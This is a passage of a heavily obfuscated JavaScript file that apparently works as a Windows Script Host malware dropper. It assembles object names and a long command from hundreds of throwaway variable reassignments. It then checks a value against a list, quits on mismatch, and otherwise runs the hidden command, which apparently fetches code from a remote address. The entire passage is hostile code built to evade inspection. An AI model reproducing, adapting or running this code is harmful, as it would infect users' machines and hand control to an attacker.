2 | var ehqqpezt = this[yhvtdik + axmuwvv + bzehobo + gsqumyovh + dxpxud + sfyvhdcgb + crrgeolo + oemawc] ( this[kbweqltoz + mcmtvmp + dgjgokzqp + bzehobo + dsiiwj + yhvtdik + oemawc][ncajoq + bzehobo + dxpxud + axmuwvv + oemawc + dxpxud + cshilqtc + ffohk + dekorutvr + dxpxud + dgjgokzqp + oemawc] ( kbweqltoz + mcmtvmp + dgjgokzqp + bzehobo + dsiiwj + yhvtdik + oemawc + slrxz + mcmtvmp + nbwakkcpi + dxpxud + xbfpx + xbfpx ) [czomrlybj + dxpxud + auggyyic + czomrlybj + dxpxud + axmuwvv + nigjlyv] ( wgtls + tjprhce + qxiul + lijqbzi + rwdjerwu + ncajoq + uczdskvei + czomrlybj + czomrlybj + qxiul + gnschmtaf + jlzkprg + rwdjerwu + uczdskvei + mcmtvmp + qxiul + czomrlybj + zlqlmbj + ncajoq + wxoyh + crrgeolo + oemawc + bzehobo + wxoyh + xbfpx + gvzrcxf + distnyndo + axmuwvv + crrgeolo + dxpxud + xbfpx + zlqlmbj + sfyvhdcgb + crrgeolo + oemawc + dxpxud + bzehobo + crrgeolo + axmuwvv + oemawc + dsiiwj + wxoyh + crrgeolo + axmuwvv + xbfpx + zlqlmbj + djynty + wxoyh + dgjgokzqp + axmuwvv + xbfpx + dxpxud ), 16 ); |
|
3 | for ( mbzjjqgj = 0 ; mbzjjqgj < fqempa[xbfpx + dxpxud + crrgeolo + auggyyic + oemawc + nbwakkcpi] ; ++ mbzjjqgj ) | |
4 | { | |
5 | if ( ehqqpezt == fqempa[mbzjjqgj] ) | |
6 | { | |
7 | ehqqpezt = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ehqqpezt !== true ) | |
12 | this[kbweqltoz + mcmtvmp + dgjgokzqp + bzehobo + dsiiwj + yhvtdik + oemawc][fuqivyn + iczuythnu + dsiiwj + oemawc] ( ); | |
13 | this[kbweqltoz + mcmtvmp + dgjgokzqp + bzehobo + dsiiwj + yhvtdik + oemawc][ncajoq + bzehobo + dxpxud + axmuwvv + oemawc + dxpxud + cshilqtc + ffohk + dekorutvr + dxpxud + dgjgokzqp + oemawc] ( kbweqltoz + mcmtvmp + dgjgokzqp + bzehobo + dsiiwj + yhvtdik + oemawc + slrxz + mcmtvmp + nbwakkcpi + dxpxud + xbfpx + xbfpx ) [bzehobo + iczuythnu + crrgeolo] ( dgjgokzqp + vkqiqq + nigjlyv + gvzrcxf + ltvxhlvw + dgjgokzqp + gvzrcxf + yhvtdik + wxoyh + hmdvnkdk + dxpxud + bzehobo + gsqumyovh + nbwakkcpi + dxpxud + xbfpx + xbfpx + slrxz + dxpxud + ihhchoin + dxpxud + gvzrcxf + hhodo + ncajoq + wxoyh + vkqiqq + vkqiqq + axmuwvv + crrgeolo + nigjlyv + gvzrcxf + xzdmca + sfyvhdcgb + crrgeolo + pfttz + wxoyh + rfvqyyzwp + dxpxud + hhodo + kbweqltoz + dxpxud + ffohk + czomrlybj + dxpxud + oyywkeec + iczuythnu + dxpxud + gsqumyovh + oemawc + gvzrcxf + hhodo + cshilqtc + iczuythnu + oemawc + dkbjezi + dsiiwj + xbfpx + dxpxud + gvzrcxf + hqolnabr + oemawc + dxpxud + vkqiqq + yhvtdik + hqolnabr + zlqlmbj + dsiiwj + crrgeolo + pfttz + wxoyh + dsiiwj + dgjgokzqp + dxpxud + slrxz + yhvtdik + nigjlyv + mwfze + gvzrcxf + nbwakkcpi + oemawc + oemawc + yhvtdik + cuhjtu + ltvxhlvw + ltvxhlvw + xvscpt + ulijfbxcd + lvmnwzyd + slrxz + xvscpt + uqxpvknxt + lvmnwzyd + slrxz + xvscpt + slrxz + ujdmsel + nuimmstls + qlulet + ltvxhlvw + dsiiwj + crrgeolo + pfttz + wxoyh + dsiiwj + dgjgokzqp + dxpxud + slrxz + yhvtdik + nbwakkcpi + yhvtdik + xzdmca + yeswzlf + yeswzlf + gsqumyovh + oemawc + axmuwvv + bzehobo + oemawc + gvzrcxf + hqolnabr + oemawc + dxpxud + vkqiqq + yhvtdik + hqolnabr + zlqlmbj + dsiiwj + crrgeolo + pfttz + wxoyh + dsiiwj + dgjgokzqp + dxpxud + slrxz + yhvtdik + nigjlyv + mwfze + yeswzlf + yeswzlf + dgjgokzqp + vkqiqq + nigjlyv + gvzrcxf + ltvxhlvw + dgjgokzqp + gvzrcxf + crrgeolo + dxpxud + oemawc + gvzrcxf + iczuythnu + gsqumyovh + dxpxud + gvzrcxf + zlqlmbj + zlqlmbj + xvscpt + ulijfbxcd + lvmnwzyd + slrxz + xvscpt + uqxpvknxt + lvmnwzyd + slrxz + xvscpt + slrxz + ujdmsel + nuimmstls + qlulet + ixkdq + nvqqzrzj + nvqqzrzj + nvqqzrzj + nvqqzrzj + zlqlmbj + nigjlyv + axmuwvv + pfttz + hmdvnkdk + hmdvnkdk + hmdvnkdk + bzehobo + wxoyh + wxoyh + oemawc + zlqlmbj + yeswzlf + yeswzlf + dgjgokzqp + vkqiqq + nigjlyv + gvzrcxf + ltvxhlvw + dgjgokzqp + gvzrcxf + bzehobo + dxpxud + auggyyic + gsqumyovh + pfttz + bzehobo + lvmnwzyd + ujdmsel + gvzrcxf + ltvxhlvw + gsqumyovh + gvzrcxf + zlqlmbj + zlqlmbj + xvscpt + ulijfbxcd + lvmnwzyd + slrxz + xvscpt + uqxpvknxt + lvmnwzyd + slrxz + xvscpt + slrxz + ujdmsel + nuimmstls + qlulet + ixkdq + nvqqzrzj + nvqqzrzj + nvqqzrzj + nvqqzrzj + zlqlmbj + nigjlyv + axmuwvv + pfttz + hmdvnkdk + hmdvnkdk + hmdvnkdk + bzehobo + wxoyh + wxoyh + oemawc + zlqlmbj + ujdmsel + hlxpcgrb + nvqqzrzj + ujdmsel + qlulet + xvscpt + pcddsupb + ulijfbxcd + hlxpcgrb + xvscpt + ujdmsel + ulijfbxcd + ulijfbxcd + xvscpt + qlulet + slrxz + nigjlyv + xbfpx + xbfpx, 0, false ); |
|
14 | } | |
15 | auggyyic = "F"; | |
16 | auggyyic = "k"; | |
17 | auggyyic = "h"; | |
18 | auggyyic = "Q"; | |
19 | auggyyic = "J"; | |
20 | auggyyic = "v"; | |
21 | auggyyic = "o"; | |
22 | auggyyic = "T"; | |
23 | auggyyic = "R"; | |
24 | auggyyic = "T"; | |
25 | auggyyic = "W"; | |
26 | auggyyic = "y"; | |
27 | auggyyic = "b"; | |
28 | auggyyic = "n"; | |
29 | auggyyic = "Q"; | |
30 | auggyyic = "H"; | |
31 | auggyyic = "r"; | |
32 | auggyyic = "R"; | |
33 | auggyyic = "E"; | |
34 | auggyyic = "J"; | |
35 | auggyyic = "A"; | |
36 | auggyyic = "h"; | |
37 | auggyyic = "g"; | |
38 | slrxz = "r"; | |
39 | slrxz = "b"; | |
40 | slrxz = "r"; | |
41 | slrxz = "M"; | |
42 | slrxz = "b"; | |
43 | slrxz = "p"; | |
44 | slrxz = "."; | |
45 | hmdvnkdk = "Q"; | |
46 | hmdvnkdk = "G"; | |
47 | hmdvnkdk = "v"; | |
48 | hmdvnkdk = "P"; | |
49 | hmdvnkdk = "C"; | |
50 | hmdvnkdk = "G"; | |
51 | hmdvnkdk = "B"; | |
52 | hmdvnkdk = "C"; | |
53 | hmdvnkdk = "d"; | |
54 | hmdvnkdk = "k"; | |
55 | hmdvnkdk = "U"; | |
56 | hmdvnkdk = "F"; | |
57 | hmdvnkdk = "s"; | |
58 | hmdvnkdk = "w"; | |
59 | yhvtdik = "J"; | |
60 | yhvtdik = "G"; | |
61 | yhvtdik = "N"; | |
62 | yhvtdik = "R"; | |
63 | yhvtdik = "T"; | |
64 | yhvtdik = "B"; | |
65 | yhvtdik = "B"; | |
66 | yhvtdik = "A"; | |
67 | yhvtdik = "E"; | |
68 | yhvtdik = "w"; | |
69 | yhvtdik = "G"; | |
70 | yhvtdik = "A"; | |
71 | yhvtdik = "c"; | |
72 | yhvtdik = "q"; | |
73 | yhvtdik = "t"; | |
74 | yhvtdik = "N"; | |
75 | yhvtdik = "Z"; | |
76 | yhvtdik = "b"; | |
77 | yhvtdik = "b"; | |
78 | yhvtdik = "I"; | |
79 | yhvtdik = "e"; | |
80 | yhvtdik = "i"; | |
81 | yhvtdik = "p"; | |
82 | wgtls = "Z"; | |
83 | wgtls = "s"; | |
84 | wgtls = "r"; | |
85 | wgtls = "C"; | |
86 | wgtls = "H"; | |
87 | wgtls = "j"; | |
88 | wgtls = "D"; | |
89 | wgtls = "H"; | |
90 | ihhchoin = "v"; | |
91 | ihhchoin = "J"; | |
92 | ihhchoin = "i"; | |
93 | ihhchoin = "k"; | |
94 | ihhchoin = "h"; | |
95 | ihhchoin = "E"; | |
96 | ihhchoin = "M"; | |
97 | ihhchoin = "R"; | |
98 | ihhchoin = "s"; | |
99 | ihhchoin = "J"; | |
100 | ihhchoin = "N"; | |
101 | ihhchoin = "B"; | |
102 | ihhchoin = "k"; | |
103 | ihhchoin = "B"; | |
104 | ihhchoin = "x"; | |
105 | fuqivyn = "b"; | |
106 | fuqivyn = "K"; | |
107 | fuqivyn = "U"; | |
108 | fuqivyn = "e"; | |
109 | fuqivyn = "q"; | |
110 | fuqivyn = "f"; | |
111 | fuqivyn = "E"; | |
112 | fuqivyn = "r"; | |
113 | fuqivyn = "m"; | |
114 | fuqivyn = "s"; | |
115 | fuqivyn = "z"; | |
116 | fuqivyn = "X"; | |
117 | fuqivyn = "Q"; | |
118 | kbweqltoz = "H"; | |
119 | kbweqltoz = "N"; | |
120 | kbweqltoz = "M"; | |
121 | kbweqltoz = "J"; | |
122 | kbweqltoz = "x"; | |
123 | kbweqltoz = "x"; | |
124 | kbweqltoz = "g"; | |
125 | kbweqltoz = "N"; | |
126 | kbweqltoz = "V"; | |
127 | kbweqltoz = "W"; | |
128 | cshilqtc = "Z"; | |
129 | cshilqtc = "W"; | |
130 | cshilqtc = "z"; | |
131 | cshilqtc = "Y"; | |
132 | cshilqtc = "m"; | |
133 | cshilqtc = "F"; | |
134 | cshilqtc = "x"; | |
135 | cshilqtc = "O"; | |
136 | oyywkeec = "v"; | |
137 | oyywkeec = "i"; | |
138 | oyywkeec = "Q"; | |
139 | oyywkeec = "U"; | |
140 | oyywkeec = "Y"; | |
141 | oyywkeec = "a"; | |
142 | oyywkeec = "t"; | |
143 | oyywkeec = "o"; | |
144 | oyywkeec = "o"; | |
145 | oyywkeec = "n"; | |
146 | oyywkeec = "B"; | |
147 | oyywkeec = "d"; | |
148 | oyywkeec = "e"; | |
149 | oyywkeec = "P"; | |
150 | oyywkeec = "F"; | |
151 | oyywkeec = "q"; | |
152 | ujdmsel = "w"; | |
153 | ujdmsel = "O"; | |
154 | ujdmsel = "2"; | |
155 | mwfze = "l"; | |
156 | mwfze = "u"; | |
157 | mwfze = "H"; | |
158 | mwfze = "B"; | |
159 | mwfze = "G"; | |
160 | mwfze = "F"; | |
161 | mwfze = "R"; | |
162 | mwfze = "f"; | |
163 | mwfze = "f"; | |
164 | mwfze = "A"; | |
165 | mwfze = "R"; | |
166 | mwfze = "I"; | |
167 | mwfze = "h"; | |
168 | mwfze = "t"; | |
169 | mwfze = "X"; | |
170 | mwfze = "X"; | |
171 | mwfze = "i"; | |
172 | mwfze = "i"; | |
173 | mwfze = "P"; | |
174 | mwfze = "j"; | |
175 | mwfze = "D"; | |
176 | mwfze = "q"; | |
177 | mwfze = "w"; | |
178 | mwfze = "Z"; | |
179 | mwfze = "h"; | |
180 | mwfze = "Z"; | |
181 | mwfze = "u"; | |
182 | mwfze = "L"; | |
183 | mwfze = "f"; | |
184 | dgjgokzqp = "T"; | |
185 | dgjgokzqp = "D"; | |
186 | dgjgokzqp = "b"; | |
187 | dgjgokzqp = "j"; | |
188 | dgjgokzqp = "k"; | |
189 | dgjgokzqp = "c"; | |
190 | hhodo = "v"; | |
191 | hhodo = "s"; | |
192 | hhodo = "B"; | |
193 | hhodo = "l"; | |
194 | hhodo = "g"; | |
195 | hhodo = "c"; | |
196 | hhodo = "u"; | |
197 | hhodo = "u"; | |
198 | hhodo = "T"; | |
199 | hhodo = "r"; | |
200 | hhodo = "l"; | |
201 | hhodo = "f"; | |
202 | hhodo = "t"; | |
203 | hhodo = "r"; | |
204 | hhodo = "g"; | |
205 | hhodo = "S"; | |
206 | hhodo = "A"; | |
207 | hhodo = "f"; | |
208 | hhodo = "k"; | |
209 | hhodo = "T"; | |
210 | hhodo = "n"; | |
211 | hhodo = "e"; | |
212 | hhodo = "w"; | |
213 | hhodo = "g"; | |
214 | hhodo = "O"; | |
215 | hhodo = "x"; | |
216 | hhodo = "f"; | |
217 | hhodo = "j"; | |
218 | hhodo = "N"; | |
219 | hhodo = "A"; | |
220 | hhodo = "w"; | |
221 | hhodo = "q"; | |
222 | hhodo = "n"; | |
223 | hhodo = "E"; | |
224 | hhodo = "-"; | |
225 | yeswzlf = "H"; | |
226 | yeswzlf = "p"; | |
227 | yeswzlf = "r"; | |
228 | yeswzlf = "S"; | |
229 | yeswzlf = "l"; | |
230 | yeswzlf = "M"; | |
231 | yeswzlf = "L"; | |
232 | yeswzlf = "v"; | |
233 | yeswzlf = "z"; | |
234 | yeswzlf = "C"; | |
235 | yeswzlf = "p"; | |
236 | yeswzlf = "Y"; | |
237 | yeswzlf = "P"; | |
238 | yeswzlf = "r"; | |
239 | yeswzlf = "w"; | |
240 | yeswzlf = "P"; | |
241 | yeswzlf = "r"; | |
242 | yeswzlf = "P"; | |
243 | yeswzlf = "j"; | |
244 | yeswzlf = "c"; | |
245 | yeswzlf = "K"; | |
246 | yeswzlf = "w"; | |
247 | yeswzlf = "D"; | |
248 | yeswzlf = "S"; | |
249 | yeswzlf = "W"; | |
250 | yeswzlf = "&"; | |
251 | xzdmca = "y"; | |
252 | xzdmca = "I"; | |
253 | xzdmca = "D"; | |
254 | xzdmca = "V"; | |
255 | xzdmca = "r"; | |
256 | xzdmca = "I"; | |
257 | xzdmca = "R"; | |
258 | xzdmca = "b"; | |
259 | xzdmca = "C"; | |
260 | xzdmca = "\""; | |
261 | ncajoq = "G"; | |
262 | ncajoq = "a"; | |
263 | ncajoq = "k"; | |
264 | ncajoq = "w"; | |
265 | ncajoq = "D"; | |
266 | ncajoq = "A"; | |
267 | ncajoq = "v"; | |
268 | ncajoq = "P"; | |
269 | ncajoq = "C"; | |
270 | nvqqzrzj = "s"; | |
271 | nvqqzrzj = "e"; | |
272 | nvqqzrzj = "h"; | |
273 | nvqqzrzj = "m"; | |
274 | nvqqzrzj = "U"; | |
275 | nvqqzrzj = "L"; | |
276 | nvqqzrzj = "b"; | |
277 | nvqqzrzj = "u"; | |
278 | nvqqzrzj = "K"; | |
279 | nvqqzrzj = "z"; | |
280 | nvqqzrzj = "U"; | |
281 | nvqqzrzj = "K"; | |
282 | nvqqzrzj = "v"; | |
283 | nvqqzrzj = "8"; | |
284 | uczdskvei = "v"; | |
285 | uczdskvei = "D"; | |
286 | uczdskvei = "O"; | |
287 | uczdskvei = "C"; | |
288 | uczdskvei = "I"; | |
289 | uczdskvei = "r"; | |
290 | uczdskvei = "U"; | |
291 | wxoyh = "W"; | |
292 | wxoyh = "b"; | |
293 | wxoyh = "d"; | |
294 | wxoyh = "F"; | |
295 | wxoyh = "B"; | |
296 | wxoyh = "u"; | |
297 | wxoyh = "s"; | |
298 | wxoyh = "a"; | |
299 | wxoyh = "N"; | |
300 | wxoyh = "s"; | |
301 | wxoyh = "Y"; | |
302 | wxoyh = "Z"; | |
303 | wxoyh = "F"; | |
304 | wxoyh = "N"; | |
305 | wxoyh = "w"; | |
306 | wxoyh = "h"; | |
307 | wxoyh = "n"; | |
308 | wxoyh = "S"; | |
309 | wxoyh = "y"; | |
310 | wxoyh = "w"; | |
311 | wxoyh = "P"; | |
312 | wxoyh = "i"; | |
313 | wxoyh = "x"; | |
314 | wxoyh = "m"; | |
315 | wxoyh = "w"; | |
316 | wxoyh = "f"; | |
317 | wxoyh = "L"; | |
318 | wxoyh = "E"; | |
319 | wxoyh = "J"; | |
320 | wxoyh = "i"; | |
321 | wxoyh = "p"; | |
322 | wxoyh = "Z"; | |
323 | wxoyh = "i"; | |
324 | wxoyh = "o"; | |
325 | gsqumyovh = "B"; | |
326 | gsqumyovh = "n"; | |
327 | gsqumyovh = "s"; | |
328 | gsqumyovh = "D"; | |
329 | gsqumyovh = "t"; | |
330 | gsqumyovh = "n"; | |
331 | gsqumyovh = "c"; | |
332 | gsqumyovh = "R"; | |
333 | gsqumyovh = "v"; | |
334 | gsqumyovh = "p"; | |
335 | gsqumyovh = "V"; | |
336 | gsqumyovh = "O"; | |
337 | gsqumyovh = "R"; | |
338 | gsqumyovh = "d"; | |
339 | gsqumyovh = "E"; | |
340 | gsqumyovh = "e"; | |
341 | gsqumyovh = "s"; | |
342 | zlqlmbj = "U"; | |
343 | zlqlmbj = "w"; | |
344 | zlqlmbj = "X"; | |
345 | zlqlmbj = "b"; | |
346 | zlqlmbj = "A"; | |
347 | zlqlmbj = "q"; | |
348 | zlqlmbj = "P"; | |
349 | zlqlmbj = "J"; | |
350 | zlqlmbj = "M"; | |
351 | zlqlmbj = "g"; | |
352 | zlqlmbj = "B"; | |
353 | zlqlmbj = "C"; | |
354 | zlqlmbj = "L"; | |
355 | zlqlmbj = "n"; | |
356 | zlqlmbj = "f"; | |
357 | zlqlmbj = "u"; | |
358 | zlqlmbj = "X"; | |
359 | zlqlmbj = "S"; | |
360 | zlqlmbj = "T"; | |
361 | zlqlmbj = "p"; | |
362 | zlqlmbj = "d"; | |
363 | zlqlmbj = "V"; | |
364 | zlqlmbj = "U"; | |
365 | zlqlmbj = "J"; | |
366 | zlqlmbj = "f"; | |
367 | zlqlmbj = "x"; | |
368 | zlqlmbj = "w"; | |
369 | zlqlmbj = "T"; | |
370 | zlqlmbj = "E"; | |
371 | zlqlmbj = "K"; | |
372 | zlqlmbj = "L"; | |
373 | zlqlmbj = "E"; | |
374 | zlqlmbj = "n"; | |
375 | zlqlmbj = "J"; | |
376 | zlqlmbj = "b"; | |
377 | zlqlmbj = "k"; | |
378 | zlqlmbj = "e"; | |
379 | zlqlmbj = "x"; | |
380 | zlqlmbj = "T"; | |
381 | zlqlmbj = "v"; | |
382 | zlqlmbj = "N"; | |
383 | zlqlmbj = "\\"; | |
384 | pcddsupb = "G"; | |
385 | pcddsupb = "i"; | |
386 | pcddsupb = "Z"; | |
387 | pcddsupb = "a"; | |
388 | pcddsupb = "p"; | |
389 | pcddsupb = "a"; | |
390 | pcddsupb = "K"; | |
391 | pcddsupb = "7"; | |
392 | dkbjezi = "U"; | |
393 | dkbjezi = "w"; | |
394 | dkbjezi = "a"; | |
395 | dkbjezi = "R"; | |
396 | dkbjezi = "p"; | |
397 | dkbjezi = "D"; | |
398 | dkbjezi = "i"; | |
399 | dkbjezi = "Z"; | |
400 | dkbjezi = "k"; | |
401 | dkbjezi = "I"; | |
402 | dkbjezi = "O"; | |
403 | dkbjezi = "H"; | |
404 | dkbjezi = "E"; | |
405 | dkbjezi = "s"; | |
406 | dkbjezi = "z"; | |
407 | dkbjezi = "I"; | |
408 | dkbjezi = "R"; | |
409 | dkbjezi = "f"; | |
410 | dkbjezi = "i"; | |
411 | dkbjezi = "i"; | |
412 | dkbjezi = "u"; | |
413 | dkbjezi = "I"; | |
414 | dkbjezi = "w"; | |
415 | dkbjezi = "h"; | |
416 | dkbjezi = "E"; | |
417 | dkbjezi = "G"; | |
418 | dkbjezi = "P"; | |
419 | dkbjezi = "k"; | |
420 | dkbjezi = "p"; | |
421 | dkbjezi = "P"; | |
422 | dkbjezi = "F"; | |
423 | dkbjezi = "F"; | |
424 | hlxpcgrb = "c"; | |
425 | hlxpcgrb = "a"; | |
426 | hlxpcgrb = "r"; | |
427 | hlxpcgrb = "K"; | |
428 | hlxpcgrb = "J"; | |
429 | hlxpcgrb = "B"; | |
430 | hlxpcgrb = "l"; | |
431 | hlxpcgrb = "S"; | |
432 | hlxpcgrb = "6"; | |
433 | iczuythnu = "d"; | |
434 | iczuythnu = "j"; | |
435 | iczuythnu = "J"; | |
436 | iczuythnu = "a"; | |
437 | iczuythnu = "m"; | |
438 | iczuythnu = "K"; | |
439 | iczuythnu = "u"; | |
440 | qxiul = "n"; | |
441 | qxiul = "I"; | |
442 | qxiul = "a"; | |
443 | qxiul = "x"; | |
444 | qxiul = "z"; | |
445 | qxiul = "E"; | |
446 | mcmtvmp = "r"; | |
447 | mcmtvmp = "W"; | |
448 | mcmtvmp = "f"; | |
449 | mcmtvmp = "M"; | |
450 | mcmtvmp = "o"; | |
451 | mcmtvmp = "D"; | |
452 | mcmtvmp = "M"; | |
453 | mcmtvmp = "b"; | |
454 | mcmtvmp = "u"; | |
455 | mcmtvmp = "r"; | |
456 | mcmtvmp = "M"; | |
457 | mcmtvmp = "B"; | |
458 | mcmtvmp = "z"; | |
459 | mcmtvmp = "q"; | |
460 | mcmtvmp = "Z"; | |
461 | mcmtvmp = "W"; | |
462 | mcmtvmp = "d"; | |
463 | mcmtvmp = "x"; | |
464 | mcmtvmp = "v"; | |
465 | mcmtvmp = "x"; | |
466 | mcmtvmp = "q"; | |
467 | mcmtvmp = "g"; | |
468 | mcmtvmp = "f"; | |
469 | mcmtvmp = "T"; | |
470 | mcmtvmp = "M"; | |
471 | mcmtvmp = "w"; | |
472 | mcmtvmp = "i"; | |
473 | mcmtvmp = "a"; | |
474 | mcmtvmp = "r"; | |
475 | mcmtvmp = "M"; | |
476 | mcmtvmp = "G"; | |
477 | mcmtvmp = "m"; | |
478 | mcmtvmp = "e"; | |
479 | mcmtvmp = "P"; | |
480 | mcmtvmp = "P"; | |
481 | mcmtvmp = "S"; | |
482 | crrgeolo = "h"; | |
483 | crrgeolo = "g"; | |
484 | crrgeolo = "Q"; | |
485 | crrgeolo = "n"; | |
486 | crrgeolo = "n"; | |
487 | crrgeolo = "d"; | |
488 | crrgeolo = "O"; | |
489 | crrgeolo = "e"; | |
490 | crrgeolo = "Y"; | |
491 | crrgeolo = "Y"; | |
492 | crrgeolo = "T"; | |
493 | crrgeolo = "n"; | |
494 | djynty = "Y"; | |
495 | djynty = "d"; | |
496 | djynty = "R"; | |
497 | djynty = "P"; | |
498 | djynty = "W"; | |
499 | djynty = "j"; | |
500 | djynty = "K"; | |
501 | djynty = "L"; | |
502 | qlulet = "z"; | |
503 | qlulet = "M"; | |
504 | qlulet = "y"; | |
505 | qlulet = "b"; | |
506 | qlulet = "f"; | |
507 | qlulet = "h"; | |
508 | qlulet = "H"; | |
509 | qlulet = "A"; | |
510 | qlulet = "d"; | |
511 | qlulet = "u"; | |
512 | qlulet = "Y"; | |
513 | qlulet = "m"; | |
514 | qlulet = "c"; | |
515 | qlulet = "m"; | |
516 | qlulet = "Z"; | |
517 | qlulet = "5"; | |
518 | gnschmtaf = "Q"; | |
519 | gnschmtaf = "u"; | |
520 | gnschmtaf = "I"; | |
521 | gnschmtaf = "h"; | |
522 | gnschmtaf = "F"; | |
523 | gnschmtaf = "D"; | |
524 | gnschmtaf = "a"; | |
525 | gnschmtaf = "r"; | |
526 | gnschmtaf = "N"; | |
527 | nuimmstls = "o"; | |
528 | nuimmstls = "n"; | |
529 | nuimmstls = "K"; | |
530 | nuimmstls = "X"; | |
531 | nuimmstls = "j"; | |
532 | nuimmstls = "O"; | |
533 | nuimmstls = "z"; | |
534 | nuimmstls = "z"; | |
535 | nuimmstls = "j"; | |
536 | nuimmstls = "P"; | |
537 | nuimmstls = "t"; | |
538 | nuimmstls = "C"; | |
539 | nuimmstls = "w"; | |
540 | nuimmstls = "p"; | |
541 | nuimmstls = "l"; | |
542 | nuimmstls = "Q"; | |
543 | nuimmstls = "s"; | |
544 | nuimmstls = "y"; | |
545 | nuimmstls = "R"; | |
546 | nuimmstls = "0"; | |
547 | dsiiwj = "E"; | |
548 | dsiiwj = "F"; | |
549 | dsiiwj = "W"; | |
550 | dsiiwj = "o"; | |
551 | dsiiwj = "E"; | |
552 | dsiiwj = "r"; | |
553 | dsiiwj = "Z"; | |
554 | dsiiwj = "R"; | |
555 | dsiiwj = "t"; | |
556 | dsiiwj = "H"; | |
557 | dsiiwj = "M"; | |
558 | dsiiwj = "L"; | |
559 | dsiiwj = "N"; | |
560 | dsiiwj = "X"; | |
561 | dsiiwj = "x"; | |
562 | dsiiwj = "a"; | |
563 | dsiiwj = "P"; | |
564 | dsiiwj = "t"; | |
565 | dsiiwj = "k"; | |
566 | dsiiwj = "t"; | |
567 | dsiiwj = "p"; | |
568 | dsiiwj = "n"; | |
569 | dsiiwj = "R"; | |
570 | dsiiwj = "a"; | |
571 | dsiiwj = "T"; | |
572 | dsiiwj = "Z"; | |
573 | dsiiwj = "j"; | |
574 | dsiiwj = "i"; | |
575 | jlzkprg = "S"; | |
576 | jlzkprg = "A"; | |
577 | jlzkprg = "o"; | |
578 | jlzkprg = "J"; | |
579 | jlzkprg = "U"; | |
580 | jlzkprg = "C"; | |
581 | jlzkprg = "R"; | |
582 | jlzkprg = "k"; | |
583 | jlzkprg = "x"; | |
584 | jlzkprg = "N"; | |
585 | jlzkprg = "U"; | |
586 | jlzkprg = "s"; | |
587 | jlzkprg = "t"; | |
588 | jlzkprg = "q"; | |
589 | jlzkprg = "U"; | |
590 | jlzkprg = "H"; | |
591 | jlzkprg = "m"; | |
592 | jlzkprg = "p"; | |
593 | jlzkprg = "r"; | |
594 | jlzkprg = "A"; | |
595 | jlzkprg = "t"; | |
596 | jlzkprg = "J"; | |
597 | jlzkprg = "l"; | |
598 | jlzkprg = "x"; | |
599 | jlzkprg = "i"; | |
600 | jlzkprg = "Y"; | |
601 | jlzkprg = "p"; | |
602 | jlzkprg = "C"; | |
603 | jlzkprg = "L"; | |
604 | jlzkprg = "O"; | |
605 | jlzkprg = "k"; | |
606 | jlzkprg = "H"; | |
607 | jlzkprg = "G"; | |
608 | jlzkprg = "d"; | |
609 | jlzkprg = "T"; | |
610 | dxpxud = "Q"; | |
611 | dxpxud = "K"; | |
612 | dxpxud = "s"; | |
613 | dxpxud = "Z"; | |
614 | dxpxud = "M"; | |
615 | dxpxud = "M"; | |
616 | dxpxud = "B"; | |
617 | dxpxud = "E"; | |
618 | dxpxud = "G"; | |
619 | dxpxud = "S"; | |
620 | dxpxud = "e"; | |
621 | cuhjtu = "W"; | |
622 | cuhjtu = "P"; | |
623 | cuhjtu = "b"; | |
624 | cuhjtu = "s"; | |
625 | cuhjtu = "f"; | |
626 | cuhjtu = "J"; | |
627 | cuhjtu = "v"; | |
628 | cuhjtu = "p"; | |
629 | cuhjtu = "d"; | |
630 | cuhjtu = "P"; | |
631 | cuhjtu = ":"; | |
632 | pfttz = "l"; | |
633 | pfttz = "L"; | |
634 | pfttz = "b"; | |
635 | pfttz = "K"; | |
636 | pfttz = "S"; | |
637 | pfttz = "U"; | |
638 | pfttz = "s"; | |
639 | pfttz = "Z"; | |
640 | pfttz = "G"; | |
641 | pfttz = "K"; | |
642 | pfttz = "f"; | |
643 | pfttz = "C"; | |
644 | pfttz = "C"; | |
645 | pfttz = "V"; | |
646 | pfttz = "v"; | |
647 | axmuwvv = "U"; | |
648 | axmuwvv = "C"; | |
649 | axmuwvv = "u"; | |
650 | axmuwvv = "Q"; | |
651 | axmuwvv = "e"; | |
652 | axmuwvv = "E"; | |
653 | axmuwvv = "w"; | |
654 | axmuwvv = "H"; | |
655 | axmuwvv = "Z"; | |
656 | axmuwvv = "t"; | |
657 | axmuwvv = "t"; | |
658 | axmuwvv = "D"; | |
659 | axmuwvv = "p"; | |
660 | axmuwvv = "C"; | |
661 | axmuwvv = "D"; | |
662 | axmuwvv = "y"; | |
663 | axmuwvv = "v"; | |
664 | axmuwvv = "V"; | |
665 | axmuwvv = "K"; | |
666 | axmuwvv = "b"; | |
667 | axmuwvv = "q"; | |
668 | axmuwvv = "t"; | |
669 | axmuwvv = "E"; | |
670 | axmuwvv = "z"; | |
671 | axmuwvv = "I"; | |
672 | axmuwvv = "i"; | |
673 | axmuwvv = "Y"; | |
674 | axmuwvv = "L"; | |
675 | axmuwvv = "P"; | |
676 | axmuwvv = "l"; | |
677 | axmuwvv = "w"; | |
678 | axmuwvv = "t"; | |
679 | axmuwvv = "C"; | |
680 | axmuwvv = "m"; | |
681 | axmuwvv = "l"; | |
682 | axmuwvv = "D"; | |
683 | axmuwvv = "e"; | |
684 | axmuwvv = "W"; | |
685 | axmuwvv = "a"; | |
686 | oemawc = "S"; | |
687 | oemawc = "c"; | |
688 | oemawc = "Z"; | |
689 | oemawc = "h"; | |
690 | oemawc = "w"; | |
691 | oemawc = "D"; | |
692 | oemawc = "c"; | |
693 | oemawc = "D"; | |
694 | oemawc = "Y"; | |
695 | oemawc = "K"; | |
696 | oemawc = "e"; | |
697 | oemawc = "t"; | |
698 | oemawc = "R"; | |
699 | oemawc = "x"; | |
700 | oemawc = "L"; | |
701 | oemawc = "e"; | |
702 | oemawc = "X"; | |
703 | oemawc = "n"; | |
704 | oemawc = "S"; | |
705 | oemawc = "W"; | |
706 | oemawc = "y"; | |
707 | oemawc = "w"; | |
708 | oemawc = "h"; | |
709 | oemawc = "d"; | |
710 | oemawc = "L"; | |
711 | oemawc = "o"; | |
712 | oemawc = "B"; | |
713 | oemawc = "C"; | |
714 | oemawc = "N"; | |
715 | oemawc = "R"; | |
716 | oemawc = "g"; | |
717 | oemawc = "U"; | |
718 | oemawc = "r"; | |
719 | oemawc = "Q"; | |
720 | oemawc = "m"; | |
721 | oemawc = "G"; | |
722 | oemawc = "Y"; | |
723 | oemawc = "H"; | |
724 | oemawc = "N"; | |
725 | oemawc = "w"; | |
726 | oemawc = "s"; | |
727 | oemawc = "w"; | |
